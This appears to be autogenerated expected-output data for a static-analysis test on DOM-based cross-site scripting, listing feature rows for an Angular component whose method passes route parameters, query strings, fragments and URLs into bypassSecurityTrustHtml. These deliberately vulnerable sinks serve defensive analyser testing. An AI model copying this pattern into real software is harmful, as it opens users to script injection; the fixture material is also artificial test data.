autogenerated/Xss/DomBasedXss/angular2-client.ts:11:8:46:1 | class A ... K\\n }\\n} | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:11:14:11:25 | AppComponent | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:11:14:11:25 | AppComponent | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:11:14:11:25 | AppComponent | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:12:3:12:7 | title | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:12:3:12:7 | title | contextSurroundingFunctionParameters | (route, sanitizer, router, sanitizer2) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:12:3:12:7 | title | enclosingFunctionBody | route ActivatedRoute sanitizer DomSanitizer router Router sanitizer2 DomSanitizer2 | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:12:3:12:7 | title | enclosingFunctionName | constructor | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:12:3:12:7 | title | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:12:3:12:19 | title = 'my-app'; | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:12:3:12:19 | title = 'my-app'; | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:12:3:12:19 | title = 'my-app'; | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:12:3:12:19 | title = 'my-app'; | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:12:3:12:19 | title = 'my-app'; | enclosingFunctionBody | route ActivatedRoute sanitizer DomSanitizer router Router sanitizer2 DomSanitizer2 | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:12:3:12:19 | title = 'my-app'; | enclosingFunctionBody | route ActivatedRoute sanitizer DomSanitizer router Router sanitizer2 DomSanitizer2 | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:12:3:12:19 | title = 'my-app'; | enclosingFunctionName | constructor | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:12:3:12:19 | title = 'my-app'; | enclosingFunctionName | constructor | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:12:3:12:19 | title = 'my-app'; | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:12:3:12:19 | title = 'my-app'; | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:12:11:12:18 | 'my-app' | assignedToPropName | title | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:12:11:12:18 | 'my-app' | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:12:11:12:18 | 'my-app' | contextSurroundingFunctionParameters | (route, sanitizer, router, sanitizer2) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:12:11:12:18 | 'my-app' | enclosingFunctionBody | route ActivatedRoute sanitizer DomSanitizer router Router sanitizer2 DomSanitizer2 | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:12:11:12:18 | 'my-app' | enclosingFunctionName | constructor | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:12:11:12:18 | 'my-app' | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:14:3:14:2 | this | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:14:3:14:2 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:14:3:14:2 | this | enclosingFunctionBody | route ActivatedRoute sanitizer DomSanitizer router Router sanitizer2 DomSanitizer2 | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:14:3:14:2 | this | enclosingFunctionName | constructor | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:14:3:14:2 | this | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:14:3:19:6 | 'arguments' object of constructor of class AppComponent | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:14:3:19:6 | 'arguments' object of constructor of class AppComponent | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:14:3:19:6 | 'arguments' object of constructor of class AppComponent | enclosingFunctionBody | route ActivatedRoute sanitizer DomSanitizer router Router sanitizer2 DomSanitizer2 | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:14:3:19:6 | 'arguments' object of constructor of class AppComponent | enclosingFunctionName | constructor | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:14:3:19:6 | 'arguments' object of constructor of class AppComponent | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:14:3:19:6 | constru ... \\n ) {} | assignedToPropName | constructor | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:14:3:19:6 | constru ... \\n ) {} | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:14:3:19:6 | constru ... \\n ) {} | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:14:3:19:6 | constru ... \\n ) {} | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:14:3:19:6 | constru ... \\n ) {} | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:14:3:19:6 | constru ... \\n ) {} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:14:3:19:6 | constru ... \\n ) {} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:14:3:19:6 | constru ... \\n ) {} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:14:3:19:6 | constru ... \\n ) {} | contextSurroundingFunctionParameters | (route, sanitizer, router, sanitizer2) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:14:3:19:6 | constru ... \\n ) {} | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:14:3:19:6 | constru ... \\n ) {} | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:14:3:19:6 | constru ... \\n ) {} | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:14:3:19:6 | constru ... \\n ) {} | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:14:3:19:6 | exceptional return of constructor of class AppComponent | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:14:3:19:6 | exceptional return of constructor of class AppComponent | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:14:3:19:6 | exceptional return of constructor of class AppComponent | enclosingFunctionBody | route ActivatedRoute sanitizer DomSanitizer router Router sanitizer2 DomSanitizer2 | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:14:3:19:6 | exceptional return of constructor of class AppComponent | enclosingFunctionName | constructor | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:14:3:19:6 | exceptional return of constructor of class AppComponent | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:14:3:19:6 | return of constructor of class AppComponent | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:14:3:19:6 | return of constructor of class AppComponent | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:14:3:19:6 | return of constructor of class AppComponent | enclosingFunctionBody | route ActivatedRoute sanitizer DomSanitizer router Router sanitizer2 DomSanitizer2 | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:14:3:19:6 | return of constructor of class AppComponent | enclosingFunctionName | constructor | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:14:3:19:6 | return of constructor of class AppComponent | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:15:5:15:33 | private ... edRoute | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:15:5:15:33 | private ... edRoute | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:15:5:15:33 | private ... edRoute | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:15:5:15:33 | private ... edRoute | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:15:5:15:33 | private ... edRoute | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:15:5:15:33 | private ... edRoute | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:15:13:15:17 | route | assignedToPropName | route | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:15:13:15:17 | route | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:15:13:15:17 | route | contextSurroundingFunctionParameters | (route, sanitizer, router, sanitizer2) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:15:13:15:17 | route | enclosingFunctionBody | route ActivatedRoute sanitizer DomSanitizer router Router sanitizer2 DomSanitizer2 | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:15:13:15:17 | route | enclosingFunctionName | constructor | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:15:13:15:17 | route | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:16:5:16:35 | private ... nitizer | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:16:5:16:35 | private ... nitizer | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:16:5:16:35 | private ... nitizer | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:16:5:16:35 | private ... nitizer | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:16:5:16:35 | private ... nitizer | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:16:5:16:35 | private ... nitizer | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:16:13:16:21 | sanitizer | assignedToPropName | sanitizer | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:16:13:16:21 | sanitizer | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:16:13:16:21 | sanitizer | contextSurroundingFunctionParameters | (route, sanitizer, router, sanitizer2) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:16:13:16:21 | sanitizer | enclosingFunctionBody | route ActivatedRoute sanitizer DomSanitizer router Router sanitizer2 DomSanitizer2 | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:16:13:16:21 | sanitizer | enclosingFunctionName | constructor | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:16:13:16:21 | sanitizer | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:17:5:17:26 | private ... Router | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:17:5:17:26 | private ... Router | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:17:5:17:26 | private ... Router | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:17:5:17:26 | private ... Router | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:17:5:17:26 | private ... Router | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:17:5:17:26 | private ... Router | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:17:13:17:18 | router | assignedToPropName | router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:17:13:17:18 | router | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:17:13:17:18 | router | contextSurroundingFunctionParameters | (route, sanitizer, router, sanitizer2) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:17:13:17:18 | router | enclosingFunctionBody | route ActivatedRoute sanitizer DomSanitizer router Router sanitizer2 DomSanitizer2 | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:17:13:17:18 | router | enclosingFunctionName | constructor | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:17:13:17:18 | router | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:18:5:18:37 | private ... itizer2 | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:18:5:18:37 | private ... itizer2 | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:18:5:18:37 | private ... itizer2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:18:5:18:37 | private ... itizer2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:18:5:18:37 | private ... itizer2 | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:18:5:18:37 | private ... itizer2 | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:18:13:18:22 | sanitizer2 | assignedToPropName | sanitizer2 | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:18:13:18:22 | sanitizer2 | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:18:13:18:22 | sanitizer2 | contextSurroundingFunctionParameters | (route, sanitizer, router, sanitizer2) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:18:13:18:22 | sanitizer2 | enclosingFunctionBody | route ActivatedRoute sanitizer DomSanitizer router Router sanitizer2 DomSanitizer2 | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:18:13:18:22 | sanitizer2 | enclosingFunctionName | constructor | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:18:13:18:22 | sanitizer2 | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:21:2 | \u0275getDOM | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:21:2 | \u0275getDOM | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:21:2 | \u0275getDOM | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:21:2 | \u0275getDOM | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:21:2 | \u0275getDOM | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:21:2 | this | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:21:2 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:21:2 | this | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:21:2 | this | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:21:2 | this | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:21:10 | ngOnInit | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:21:10 | ngOnInit | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:21:10 | ngOnInit | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:41:3 | 'arguments' object of method ngOnInit of class AppComponent | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:41:3 | 'arguments' object of method ngOnInit of class AppComponent | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:41:3 | 'arguments' object of method ngOnInit of class AppComponent | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:41:3 | 'arguments' object of method ngOnInit of class AppComponent | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:41:3 | 'arguments' object of method ngOnInit of class AppComponent | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:41:3 | exceptional return of method ngOnInit of class AppComponent | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:41:3 | exceptional return of method ngOnInit of class AppComponent | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:41:3 | exceptional return of method ngOnInit of class AppComponent | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:41:3 | exceptional return of method ngOnInit of class AppComponent | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:41:3 | exceptional return of method ngOnInit of class AppComponent | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:41:3 | ngOnIni ... OK\\n } | assignedToPropName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:41:3 | ngOnIni ... OK\\n } | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:41:3 | ngOnIni ... OK\\n } | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:41:3 | ngOnIni ... OK\\n } | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:41:3 | ngOnIni ... OK\\n } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:41:3 | ngOnIni ... OK\\n } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:41:3 | ngOnIni ... OK\\n } | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:41:3 | ngOnIni ... OK\\n } | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:41:3 | ngOnIni ... OK\\n } | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:41:3 | ngOnIni ... OK\\n } | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:41:3 | return of method ngOnInit of class AppComponent | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:41:3 | return of method ngOnInit of class AppComponent | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:41:3 | return of method ngOnInit of class AppComponent | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:41:3 | return of method ngOnInit of class AppComponent | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:21:3:41:3 | return of method ngOnInit of class AppComponent | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:5:22:8 | this | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:5:22:8 | this | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:5:22:8 | this | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:5:22:8 | this | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:5:22:8 | this | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:5:22:18 | this.sanitizer | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:5:22:18 | this.sanitizer | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:5:22:18 | this.sanitizer | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:5:22:18 | this.sanitizer | enclosingFunctionName | ngOnInit | +| 